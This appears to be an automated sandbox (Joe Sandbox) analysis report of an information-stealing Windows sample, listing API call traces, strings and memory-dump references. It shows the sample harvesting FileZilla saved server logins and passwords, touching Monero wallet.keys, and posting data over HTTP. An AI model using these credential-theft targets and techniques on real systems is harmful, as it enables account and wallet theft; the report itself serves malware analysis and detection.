GetProcAddress.KERNEL32(74DD0000,00E6E020), ref: 003D9FFA
GetProcAddress.KERNEL32(74DD0000,00E55890), ref: 003DA013
GetProcAddress.KERNEL32(74DD0000,00E55B70), ref: 003DA02B
LoadLibraryA.KERNEL32(00E6E008,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA03D
LoadLibraryA.KERNEL32(00E6E038,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA04E
LoadLibraryA.KERNEL32(00E6E050,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA060
LoadLibraryA.KERNEL32(00E6E068,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA072
LoadLibraryA.KERNEL32(00E6E0B0,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA083
LoadLibraryA.KERNEL32(00E6E128,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA095
LoadLibraryA.KERNEL32(00E6E0C8,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA0A7
LoadLibraryA.KERNEL32(00E6E0E0,?,003D5CA3,003E0AEB,?,?,?,?,?,?,?,?,?,?,003E0AEA,003E0AE3), ref: 003DA0B8
GetProcAddress.KERNEL32(75290000,00E55AB0), ref: 003DA0DA
GetProcAddress.KERNEL32(75290000,00E6E368), ref: 003DA0F2
GetProcAddress.KERNEL32(75290000,00E6A0A8), ref: 003DA10A
GetProcAddress.KERNEL32(75290000,00E6E308), ref: 003DA123
GetProcAddress.KERNEL32(75290000,00E55BF0), ref: 003DA13B
GetProcAddress.KERNEL32(734C0000,00E5C9D0), ref: 003DA160
GetProcAddress.KERNEL32(734C0000,00E55DD0), ref: 003DA179
GetProcAddress.KERNEL32(734C0000,00E5C890), ref: 003DA191
GetProcAddress.KERNEL32(734C0000,00E6E2D8), ref: 003DA1A9
GetProcAddress.KERNEL32(734C0000,00E6E2A8), ref: 003DA1C2
GetProcAddress.KERNEL32(734C0000,00E55C10), ref: 003DA1DA
GetProcAddress.KERNEL32(734C0000,00E55AF0), ref: 003DA1F2
GetProcAddress.KERNEL32(734C0000,00E6E320), ref: 003DA20B
GetProcAddress.KERNEL32(752C0000,00E55DF0), ref: 003DA22C
GetProcAddress.KERNEL32(752C0000,00E55CD0), ref: 003DA244
GetProcAddress.KERNEL32(752C0000,00E6E2C0), ref: 003DA25D
GetProcAddress.KERNEL32(752C0000,00E6E350), ref: 003DA275
GetProcAddress.KERNEL32(752C0000,00E55C90), ref: 003DA28D
GetProcAddress.KERNEL32(74EC0000,00E5C728), ref: 003DA2B3
GetProcAddress.KERNEL32(74EC0000,00E5C7C8), ref: 003DA2CB
GetProcAddress.KERNEL32(74EC0000,00E6E338), ref: 003DA2E3
GetProcAddress.KERNEL32(74EC0000,00E55B90), ref: 003DA2FC
GetProcAddress.KERNEL32(74EC0000,00E55E30), ref: 003DA314
GetProcAddress.KERNEL32(74EC0000,00E5C778), ref: 003DA32C
GetProcAddress.KERNEL32(75BD0000,00E6E2F0), ref: 003DA352
GetProcAddress.KERNEL32(75BD0000,00E55AD0), ref: 003DA36A
GetProcAddress.KERNEL32(75BD0000,00E6A1F8), ref: 003DA382
GetProcAddress.KERNEL32(75BD0000,00E6E3B0), ref: 003DA39B
GetProcAddress.KERNEL32(75BD0000,00E6E290), ref: 003DA3B3
GetProcAddress.KERNEL32(75BD0000,00E55D90), ref: 003DA3CB
GetProcAddress.KERNEL32(75BD0000,00E55BB0), ref: 003DA3E4
GetProcAddress.KERNEL32(75BD0000,00E6E380), ref: 003DA3FC
GetProcAddress.KERNEL32(75BD0000,00E6E398), ref: 003DA414
GetProcAddress.KERNEL32(75A70000,00E55CF0), ref: 003DA436
GetProcAddress.KERNEL32(75A70000,00E6E3C8), ref: 003DA44E
GetProcAddress.KERNEL32(75A70000,00E6E260), ref: 003DA466
GetProcAddress.KERNEL32(75A70000,00E6E3E0), ref: 003DA47F
GetProcAddress.KERNEL32(75A70000,00E6E230), ref: 003DA497
GetProcAddress.KERNEL32(75450000,00E55E10), ref: 003DA4B8
GetProcAddress.KERNEL32(75450000,00E55C30), ref: 003DA4D1
GetProcAddress.KERNEL32(75DA0000,00E55BD0), ref: 003DA4F2
GetProcAddress.KERNEL32(75DA0000,00E6E248), ref: 003DA50A
GetProcAddress.KERNEL32(6F280000,00E55C70), ref: 003DA530
GetProcAddress.KERNEL32(6F280000,00E55D70), ref: 003DA548
GetProcAddress.KERNEL32(6F280000,00E55C50), ref: 003DA560
GetProcAddress.KERNEL32(6F280000,00E6E278), ref: 003DA579
GetProcAddress.KERNEL32(6F280000,00E55DB0), ref: 003DA591
GetProcAddress.KERNEL32(6F280000,00E55D10), ref: 003DA5A9
GetProcAddress.KERNEL32(6F280000,00E55B10), ref: 003DA5C2
GetProcAddress.KERNEL32(6F280000,00E55CB0), ref: 003DA5DA
GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 003DA5F1
GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 003DA607
GetProcAddress.KERNEL32(75AF0000,00E6DD68), ref: 003DA629
GetProcAddress.KERNEL32(75AF0000,00E6A0D8), ref: 003DA641
GetProcAddress.KERNEL32(75AF0000,00E6DE10), ref: 003DA659
GetProcAddress.KERNEL32(75AF0000,00E6DEE8), ref: 003DA672
GetProcAddress.KERNEL32(75D90000,00E55B30), ref: 003DA693
GetProcAddress.KERNEL32(6F9D0000,00E6DDE0), ref: 003DA6B4
GetProcAddress.KERNEL32(6F9D0000,00E55D50), ref: 003DA6CD
GetProcAddress.KERNEL32(6F9D0000,00E6DE28), ref: 003DA6E5
GetProcAddress.KERNEL32(6F9D0000,00E6DED0), ref: 003DA6FD

Strings

p], xrefs: 003DA53B
, xrefs: 003D9FED
0[, xrefs: 003DA686
@, xrefs: 003D9EFA
p\, xrefs: 003DA522
0X, xrefs: 003D9D5C
H, xrefs: 003DA4FD
X, xrefs: 003D9E1F
, xrefs: 003DA471
PX, xrefs: 003D9FBC
8, xrefs: 003DA048
PZ, xrefs: 003D9D44
0^, xrefs: 003DA307
(, xrefs: 003DA08E
p, xrefs: 003D9EE1
P\, xrefs: 003DA553
, xrefs: 003DA0B2
P, xrefs: 003DA268
0, xrefs: 003DA48A
, xrefs: 003DA1FD
InternetSetOptionA, xrefs: 003DA5E5
x, xrefs: 003DA56B
0\, xrefs: 003DA4C3
P], xrefs: 003DA6BF
, xrefs: 003D9E06
`, xrefs: 003DA459
p[, xrefs: 003DA01E
h, xrefs: 003DA0E5
P, xrefs: 003DA059
h, xrefs: 003DA06B
pZ, xrefs: 003D9D74
HttpQueryInfoA, xrefs: 003DA5FC
8, xrefs: 003DA2D6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: $ $($0X$0[$0\$0^$0$8$8$@$HttpQueryInfoA$H$InternetSetOptionA$PX$PZ$P\$P]$P$P$X$`$h$h$pZ$p[$p\$p]$p$x$$$
API String ID: 2238633743-356210419
Opcode ID: 74161ef00cec526be61547549bcbf7e871c5d918f3cfc5324f0c4786ea3fa604
Instruction ID: ac9773cab5ab0017c059a6b0900aee5975d0ceb51b08f029f12d936759f5ceb4
Opcode Fuzzy Hash: 74161ef00cec526be61547549bcbf7e871c5d918f3cfc5324f0c4786ea3fa604
Instruction Fuzzy Hash: 9C621DB9590300AFC345DFE8ED889A737FBF74C381714E61AE609C3264E6799841DB52

Function 003C7710 Relevance: 100.3, APIs: 54, Strings: 3, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C7724
RtlAllocateHeap.NTDLL(00000000), ref: 003C772B
lstrcat.KERNEL32(?,00E57B50), ref: 003C78DB
lstrcat.KERNEL32(?,?), ref: 003C78EF
lstrcat.KERNEL32(?,?), ref: 003C7903
lstrcat.KERNEL32(?,?), ref: 003C7917
lstrcat.KERNEL32(?,00E6EF58), ref: 003C792B
lstrcat.KERNEL32(?,00E6F168), ref: 003C793F
lstrcat.KERNEL32(?,00E6F030), ref: 003C7952
lstrcat.KERNEL32(?,00E6F1F8), ref: 003C7966
lstrcat.KERNEL32(?,00E6BAA8), ref: 003C797A
lstrcat.KERNEL32(?,?), ref: 003C798E
lstrcat.KERNEL32(?,?), ref: 003C79A2
lstrcat.KERNEL32(?,?), ref: 003C79B6
lstrcat.KERNEL32(?,00E6EF58), ref: 003C79C9
lstrcat.KERNEL32(?,00E6F168), ref: 003C79DD
lstrcat.KERNEL32(?,00E6F030), ref: 003C79F1
lstrcat.KERNEL32(?,00E6F1F8), ref: 003C7A04
lstrcat.KERNEL32(?,00E6AB38), ref: 003C7A18
lstrcat.KERNEL32(?,?), ref: 003C7A2C
lstrcat.KERNEL32(?,?), ref: 003C7A40
lstrcat.KERNEL32(?,?), ref: 003C7A54
lstrcat.KERNEL32(?,00E6EF58), ref: 003C7A68
lstrcat.KERNEL32(?,00E6F168), ref: 003C7A7B
lstrcat.KERNEL32(?,00E6F030), ref: 003C7A8F
lstrcat.KERNEL32(?,00E6F1F8), ref: 003C7AA3
lstrcat.KERNEL32(?,00E6ABA0), ref: 003C7AB6
lstrcat.KERNEL32(?,?), ref: 003C7ACA
lstrcat.KERNEL32(?,?), ref: 003C7ADE
lstrcat.KERNEL32(?,?), ref: 003C7AF2
lstrcat.KERNEL32(?,00E6EF58), ref: 003C7B06
lstrcat.KERNEL32(?,00E6F168), ref: 003C7B1A
lstrcat.KERNEL32(?,00E6F030), ref: 003C7B2D
lstrcat.KERNEL32(?,00E6F1F8), ref: 003C7B41
lstrcat.KERNEL32(?,00E6AC08), ref: 003C7B55
lstrcat.KERNEL32(?,?), ref: 003C7B69
lstrcat.KERNEL32(?,?), ref: 003C7B7D
lstrcat.KERNEL32(?,?), ref: 003C7B91
lstrcat.KERNEL32(?,00E6EF58), ref: 003C7BA4
lstrcat.KERNEL32(?,00E6F168), ref: 003C7BB8
lstrcat.KERNEL32(?,00E6F030), ref: 003C7BCC
lstrcat.KERNEL32(?,00E6F1F8), ref: 003C7BDF
lstrcat.KERNEL32(?,00E6AC70), ref: 003C7BF3
lstrcat.KERNEL32(?,?), ref: 003C7C07
lstrcat.KERNEL32(?,?), ref: 003C7C1B
lstrcat.KERNEL32(?,?), ref: 003C7C2F
lstrcat.KERNEL32(?,00E6EF58), ref: 003C7C43
lstrcat.KERNEL32(?,00E6F168), ref: 003C7C56
lstrcat.KERNEL32(?,00E6F030), ref: 003C7C6A
lstrcat.KERNEL32(?,00E6F1F8), ref: 003C7C7E

Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020,003E17FC), ref: 003C7606
Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020,00000000), ref: 003C7648
Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020, : ), ref: 003C765A
Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020,00000000), ref: 003C768F
Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020,003E1804), ref: 003C76A0
Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020,00000000), ref: 003C76D3
Part of subcall function 003C75D0: lstrcat.KERNEL32(2F783020,003E1808), ref: 003C76ED
Part of subcall function 003C75D0: task.LIBCPMTD ref: 003C76FB

lstrcat.KERNEL32(?,00E6F588), ref: 003C7E0B
lstrcat.KERNEL32(?,00E6EA58), ref: 003C7E1E
lstrlen.KERNEL32(2F783020), ref: 003C7E2B
lstrlen.KERNEL32(2F783020), ref: 003C7E3B

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

P{, xrefs: 003C78CE
X, xrefs: 003C791D, 003C79BC, 003C7A5A, 003C7AF8, 003C7B97, 003C7C35
X, xrefs: 003C7E11

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID: P{$X$X
API String ID: 928082926-1261913296
Opcode ID: 2eea1f3d4504189e742cee7a7c051878b8ff9e2c98bc3a9e7477457392e13266
Instruction ID: 4dee3fbc631a712b6f4e7b263e4fb641fb0eff20249ed6cffe66f7e3bb0e6da4
Opcode Fuzzy Hash: 2eea1f3d4504189e742cee7a7c051878b8ff9e2c98bc3a9e7477457392e13266
Instruction Fuzzy Hash: 32322DB6940314ABCB15EBA0DC85DEF737DBB48700F045A89F209A6190EF74E78A8F51

Function 003D0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

Part of subcall function 003D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003D8E52

GetProcessHeap.KERNEL32(00000000,000F423F,003E0DBA,003E0DB7,003E0DB6,003E0DB3), ref: 003D0362
RtlAllocateHeap.NTDLL(00000000), ref: 003D0369
StrStrA.SHLWAPI(00000000,<Host>), ref: 003D0385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0393
StrStrA.SHLWAPI(00000000,<Port>), ref: 003D03CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D03DD
StrStrA.SHLWAPI(00000000,<User>), ref: 003D0419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003D0463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D0532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 003D0562
lstrcat.KERNEL32(?,profile: null), ref: 003D0571
lstrcat.KERNEL32(?,url: ), ref: 003D0580
lstrcat.KERNEL32(?,00000000), ref: 003D0593
lstrcat.KERNEL32(?,003E1678), ref: 003D05A2
lstrcat.KERNEL32(?,00000000), ref: 003D05B5
lstrcat.KERNEL32(?,003E167C), ref: 003D05C4
lstrcat.KERNEL32(?,login: ), ref: 003D05D3
lstrcat.KERNEL32(?,00000000), ref: 003D05E6
lstrcat.KERNEL32(?,003E1688), ref: 003D05F5
lstrcat.KERNEL32(?,password: ), ref: 003D0604
lstrcat.KERNEL32(?,00000000), ref: 003D0617
lstrcat.KERNEL32(?,003E1698), ref: 003D0626
lstrcat.KERNEL32(?,003E169C), ref: 003D0635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E0DB2), ref: 003D068E

Strings

<Pass encoding="base64">, xrefs: 003D045A
login: , xrefs: 003D05CA
profile: null, xrefs: 003D0568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 003D02A4
url: , xrefs: 003D0577
password: , xrefs: 003D05FB
<User>, xrefs: 003D0410
<Host>, xrefs: 003D037C
browser: FileZilla, xrefs: 003D0559
<Port>, xrefs: 003D03C6

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: 0db7175a33662f83f3639428a070c99a7c76e71a70cf6664d15db54d118d55c3
Instruction ID: ac360a228a2e6ba8969420dc567257c93001e3d3aeed6479c13efe9d8d438b1f
Opcode Fuzzy Hash: 0db7175a33662f83f3639428a070c99a7c76e71a70cf6664d15db54d118d55c3
Instruction Fuzzy Hash: 21D164729402089BCB05FBF4ED96EEE7739FF14700F408519F502AA291EF74AA45DB62

Function 003C5100 Relevance: 49.6, APIs: 19, Strings: 9, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003C4839
Part of subcall function 003C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003C4849

lstrlen.KERNEL32(00000000), ref: 003C5193

Part of subcall function 003D8EA0: CryptBinaryToStringA.CRYPT32(00000000,003C5184,40000001,00000000,00000000,?,003C5184), ref: 003D8EC0

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003C5207
StrCmpCA.SHLWAPI(?,00E6F518), ref: 003C5225
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003C5340
HttpOpenRequestA.WININET(00000000,00E6F488,?,00E6F000,00000000,00000000,00400100,00000000), ref: 003C53A4

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00E69F38,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,00E6F628,00000000,?,00E6B848,00000000,?,003E19DC,00000000,?,003D51CF), ref: 003C5737
lstrlen.KERNEL32(00000000), ref: 003C574B
GetProcessHeap.KERNEL32(00000000,?), ref: 003C575C
RtlAllocateHeap.NTDLL(00000000), ref: 003C5763
lstrlen.KERNEL32(00000000), ref: 003C5778
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C57A9
lstrlen.KERNEL32(00000000), ref: 003C57C8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003C57E1
lstrlen.KERNEL32(00000000,?,?), ref: 003C580E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003C5822
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003C584D
InternetCloseHandle.WININET(00000000), ref: 003C58B1
InternetCloseHandle.WININET(00000000), ref: 003C58BE
InternetCloseHandle.WININET(00000000), ref: 003C58C8

Strings

------, xrefs: 003C563B
", xrefs: 003C55C4
--, xrefs: 003C5280
", xrefs: 003C5482
------, xrefs: 003C53B7
------, xrefs: 003C5297
------, xrefs: 003C54F9
de-DE, xrefs: 003C5375
", xrefs: 003C5706

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
